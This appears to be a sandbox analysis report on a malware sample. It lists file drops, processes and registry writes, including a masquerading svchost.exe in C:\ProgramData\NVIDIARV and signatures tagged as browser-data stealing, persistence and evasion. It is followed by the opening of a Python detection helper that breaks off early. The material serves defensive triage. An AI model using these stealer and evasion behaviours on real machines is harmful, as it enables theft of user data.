File created C:\Program Files\Google\Chrome\Temp\source1908_108397436\Chrome-bin\109.0.5414.120\109.0.5414.120.manifest C:\Program Files (x86)\Google\Update\Install\{01B7CFE2-711B-4A35-8C7A-D0228AAEC6E9}\CR_C437E.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source1908_108397436\Chrome-bin\109.0.5414.120\resources.pak C:\Program Files (x86)\Google\Update\Install\{01B7CFE2-711B-4A35-8C7A-D0228AAEC6E9}\CR_C437E.tmp\setup.exe N/A
File created C:\Program Files (x86)\Google\Temp\GUMF133.tmp\goopdateres_en-GB.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Program Files (x86)\Google\Temp\GUMF133.tmp\goopdateres_lt.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Program Files (x86)\Google\Update\1.3.36.312\goopdateres_ca.dll C:\Program Files (x86)\Google\Temp\GUMF133.tmp\GoogleUpdate.exe N/A
File created C:\Program Files (x86)\Google\Update\1.3.36.312\goopdateres_nl.dll C:\Program Files (x86)\Google\Temp\GUMF133.tmp\GoogleUpdate.exe N/A
File created C:\Program Files (x86)\Google\Update\1.3.36.312\goopdateres_ro.dll C:\Program Files (x86)\Google\Temp\GUMF133.tmp\GoogleUpdate.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source1908_108397436\Chrome-bin\109.0.5414.120\Locales\hr.pak C:\Program Files (x86)\Google\Update\Install\{01B7CFE2-711B-4A35-8C7A-D0228AAEC6E9}\CR_C437E.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source1908_108397436\Chrome-bin\109.0.5414.120\Locales\ml.pak C:\Program Files (x86)\Google\Update\Install\{01B7CFE2-711B-4A35-8C7A-D0228AAEC6E9}\CR_C437E.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source1908_108397436\Chrome-bin\chrome.exe C:\Program Files (x86)\Google\Update\Install\{01B7CFE2-711B-4A35-8C7A-D0228AAEC6E9}\CR_C437E.tmp\setup.exe N/A
File created C:\Program Files (x86)\Google\Update\1.3.36.312\goopdateres_fr.dll C:\Program Files (x86)\Google\Temp\GUMF133.tmp\GoogleUpdate.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source1908_108397436\Chrome-bin\109.0.5414.120\nacl_irt_x86_64.nexe C:\Program Files (x86)\Google\Update\Install\{01B7CFE2-711B-4A35-8C7A-D0228AAEC6E9}\CR_C437E.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source1908_108397436\Chrome-bin\chrome.VisualElementsManifest.xml C:\Program Files (x86)\Google\Update\Install\{01B7CFE2-711B-4A35-8C7A-D0228AAEC6E9}\CR_C437E.tmp\setup.exe N/A
File created C:\Program Files (x86)\Google\Update\1.3.36.312\goopdateres_hu.dll C:\Program Files (x86)\Google\Temp\GUMF133.tmp\GoogleUpdate.exe N/A
File created C:\Program Files (x86)\Google\Update\1.3.36.312\goopdateres_lt.dll C:\Program Files (x86)\Google\Temp\GUMF133.tmp\GoogleUpdate.exe N/A
File created C:\Program Files (x86)\Google\Update\1.3.36.312\goopdateres_sr.dll C:\Program Files (x86)\Google\Temp\GUMF133.tmp\GoogleUpdate.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source1908_108397436\Chrome-bin\109.0.5414.120\Locales\es-419.pak C:\Program Files (x86)\Google\Update\Install\{01B7CFE2-711B-4A35-8C7A-D0228AAEC6E9}\CR_C437E.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source1908_108397436\Chrome-bin\109.0.5414.120\Locales\sw.pak C:\Program Files (x86)\Google\Update\Install\{01B7CFE2-711B-4A35-8C7A-D0228AAEC6E9}\CR_C437E.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source1908_108397436\Chrome-bin\109.0.5414.120\chrome_200_percent.pak C:\Program Files (x86)\Google\Update\Install\{01B7CFE2-711B-4A35-8C7A-D0228AAEC6E9}\CR_C437E.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source1908_108397436\Chrome-bin\109.0.5414.120\default_apps\external_extensions.json C:\Program Files (x86)\Google\Update\Install\{01B7CFE2-711B-4A35-8C7A-D0228AAEC6E9}\CR_C437E.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source1908_108397436\Chrome-bin\109.0.5414.120\mojo_core.dll C:\Program Files (x86)\Google\Update\Install\{01B7CFE2-711B-4A35-8C7A-D0228AAEC6E9}\CR_C437E.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source1908_108397436\Chrome-bin\109.0.5414.120\Locales\bg.pak C:\Program Files (x86)\Google\Update\Install\{01B7CFE2-711B-4A35-8C7A-D0228AAEC6E9}\CR_C437E.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source1908_108397436\Chrome-bin\109.0.5414.120\Locales\de.pak C:\Program Files (x86)\Google\Update\Install\{01B7CFE2-711B-4A35-8C7A-D0228AAEC6E9}\CR_C437E.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source1908_108397436\Chrome-bin\109.0.5414.120\chrome_elf.dll C:\Program Files (x86)\Google\Update\Install\{01B7CFE2-711B-4A35-8C7A-D0228AAEC6E9}\CR_C437E.tmp\setup.exe N/A
File created C:\Program Files (x86)\Google\Temp\GUMF133.tmp\goopdateres_kn.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe C:\Program Files (x86)\Google\Temp\GUMF133.tmp\GoogleUpdate.exe N/A
File created C:\Program Files (x86)\Google\Update\1.3.36.312\goopdateres_kn.dll C:\Program Files (x86)\Google\Temp\GUMF133.tmp\GoogleUpdate.exe N/A
File created C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe C:\Program Files (x86)\Google\Temp\GUMF133.tmp\GoogleUpdate.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source1908_108397436\Chrome-bin\109.0.5414.120\VisualElements\LogoDev.png C:\Program Files (x86)\Google\Update\Install\{01B7CFE2-711B-4A35-8C7A-D0228AAEC6E9}\CR_C437E.tmp\setup.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\INF\setupapi.ev1 C:\Windows\system32\DrvInst.exe N/A
File opened for modification C:\Windows\INF\setupapi.dev.log C:\Windows\system32\DrvInst.exe N/A
File opened for modification C:\Windows\Installer\f76bc0f.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIBD38.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\f76bc12.ipi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIC077.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\f76bc12.ipi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\INF\setupapi.ev3 C:\Windows\system32\DrvInst.exe N/A
File created C:\Windows\Installer\f76bc0f.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIBC6C.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIBD97.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIBE24.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIBEA2.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\ C:\Windows\system32\msiexec.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\ProgramData\setup\aa.exe N/A
N/A N/A C:\ProgramData\Packas\scrok.exe N/A
N/A N/A C:\ProgramData\Smart\TjNkNpAilaYvt.exe N/A
N/A N/A C:\ProgramData\Smart\TjNkNpAilaYvt.exe N/A
N/A N/A C:\ProgramData\Smart\TjNkNpAilaYvt.exe N/A
N/A N/A C:\ProgramData\Smart\TjNkNpAilaYvt.exe N/A
N/A N/A C:\ProgramData\Packas\scrok.exe N/A
N/A N/A C:\ProgramData\Smart\setup.exe N/A
N/A N/A C:\ProgramData\setup\setup.exe N/A
N/A N/A C:\Program Files (x86)\Google\Temp\GUMF133.tmp\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\ProgramData\NVIDIARV\svchost.exe N/A
N/A N/A C:\ProgramData\NVIDIARV\svchost.exe N/A
N/A N/A C:\ProgramData\NVIDIARV\svchost.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\Install\{01B7CFE2-711B-4A35-8C7A-D0228AAEC6E9}\109.0.5414.120_chrome_installer.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\Install\{01B7CFE2-711B-4A35-8C7A-D0228AAEC6E9}\CR_C437E.tmp\setup.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\Install\{01B7CFE2-711B-4A35-8C7A-D0228AAEC6E9}\CR_C437E.tmp\setup.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\Install\{01B7CFE2-711B-4A35-8C7A-D0228AAEC6E9}\CR_C437E.tmp\setup.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\Install\{01B7CFE2-711B-4A35-8C7A-D0228AAEC6E9}\CR_C437E.tmp\setup.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\109.0.5414.120\elevation_service.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\ProgramData\Smart\setup.exe N/A
N/A N/A C:\ProgramData\Smart\setup.exe N/A
N/A N/A C:\ProgramData\Smart\setup.exe N/A
N/A N/A C:\ProgramData\setup\setup.exe N/A
N/A N/A C:\Program Files (x86)\Google\Temp\GUMF133.tmp\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Temp\GUMF133.tmp\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Temp\GUMF133.tmp\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Temp\GUMF133.tmp\GoogleUpdate.exe N/A
N/A N/A C:\ProgramData\Smart\setup.exe N/A
N/A N/A C:\ProgramData\Smart\setup.exe N/A
N/A N/A C:\ProgramData\Smart\setup.exe N/A
N/A N/A C:\ProgramData\Smart\setup.exe N/A
N/A N/A C:\ProgramData\NVIDIARV\svchost.exe N/A
N/A N/A C:\ProgramData\NVIDIARV\svchost.exe N/A
N/A N/A C:\ProgramData\NVIDIARV\svchost.exe N/A
N/A N/A C:\ProgramData\NVIDIARV\svchost.exe N/A
N/A N/A C:\ProgramData\NVIDIARV\svchost.exe N/A
N/A N/A C:\ProgramData\NVIDIARV\svchost.exe N/A
N/A N/A C:\ProgramData\Smart\setup.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\ProgramData\Smart\setup.exe N/A
N/A N/A C:\ProgramData\NVIDIARV\svchost.exe N/A
N/A N/A C:\ProgramData\NVIDIARV\svchost.exe N/A
N/A N/A C:\ProgramData\NVIDIARV\svchost.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Temp\GUMF133.tmp\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Temp\GUMF133.tmp\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Temp\GUMF133.tmp\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Temp\GUMF133.tmp\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Temp\GUMF133.tmp\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Temp\GUMF133.tmp\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\Install\{01B7CFE2-711B-4A35-8C7A-D0228AAEC6E9}\109.0.5414.120_chrome_installer.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

Event Triggered Execution: Installer Packages

persistence privilege_escalation
Description Indicator Process Target
N/A N/A C:\Windows\system32\msiexec.exe N/A

Reads user/profile data of web browsers

spyware stealer

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\timeout.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\NVIDIARV\svchost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\NVIDIARV\svchost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\syswow64\MsiExec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\Smart\setup.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\setup\setup.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\NVIDIARV\svchost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\timeout.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Google\Temp\GUMF133.tmp\GoogleUpdate.exe N/A

System Network Configuration Discovery: Internet Connection Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A

Delays execution with timeout.exe

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2E C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs C:\Windows\system32\DrvInst.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SYSTEM\CurrentControlSet\Services\Group = "Fatal" C:\ProgramData\NVIDIARV\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\system32\DrvInst.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\system32\DrvInst.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SYSTEM\CurrentControlSet\Services\ C:\ProgramData\NVIDIARV\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates C:\Windows\system32\DrvInst.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SYSTEM\CurrentControlSet\Services\InstallTime = "2025-02-21 23:08" C:\ProgramData\NVIDIARV\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\system32\DrvInst.exe N/A
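Reading the "Executes dropped EXE", "Loads dropped DLL" and "Modifies data under HKEY_USERS" tables above by hand, the rows that matter are easy to lose among the GoogleUpdate/Chrome installer activity (a full Chrome 109.0.5414.120 install runs alongside the payload) and the DrvInst.exe certificate-store writes that any MSI-driven driver install produces. The strong signals are structural: a file named svchost.exe running from C:\ProgramData\NVIDIARV rather than System32, three different executables launched from C:\ProgramData, and that same svchost.exe writing Group and InstallTime under HKU\.DEFAULT\SYSTEM\CurrentControlSet\Services. The script below is an added example written for this page, not code from the sandbox vendor or from the report; it parses the flattened row format used in these tables (fields are space-separated, so it splits only on a space that begins a drive-letter path, which keeps "C:\Program Files (x86)\..." intact) and applies those path- and key-based heuristics. The tag names, the list of system-only binary names, the writable-location roots and the "installer-noise" classification for DrvInst.exe/msiexec.exe are this example's own assumptions. It keys on the Services key rather than on the literal "Fatal" group string, so a sample that changes the value still trips the rule.

```python
"""Triage helper for the flattened sandbox signature rows shown above.

Added example for this page, not code from the sandbox vendor or from the
report. It parses rows of the form "<description> <indicator> <process>
<target>" and applies four heuristics whose allow-lists and tag names are
this example's own assumptions:

  masquerade          a system-only binary name (svchost.exe, ...) running
                      from outside %SystemRoot%\\System32 or SysWOW64
  writable-location   a process image under C:\\ProgramData, C:\\Users\\Public
                      or any AppData tree
  hku-services-write  a non-system process writing under
                      HKU\\.DEFAULT\\SYSTEM\\CurrentControlSet\\Services
  installer-noise     DrvInst.exe / msiexec.exe touching certificate-store,
                      WinTrust or MuiCache keys (expected during MSI installs)
"""
import re
from dataclasses import dataclass

# Split only on a space that is immediately followed by a drive-letter path,
# so "C:\Program Files (x86)\..." survives as one field.
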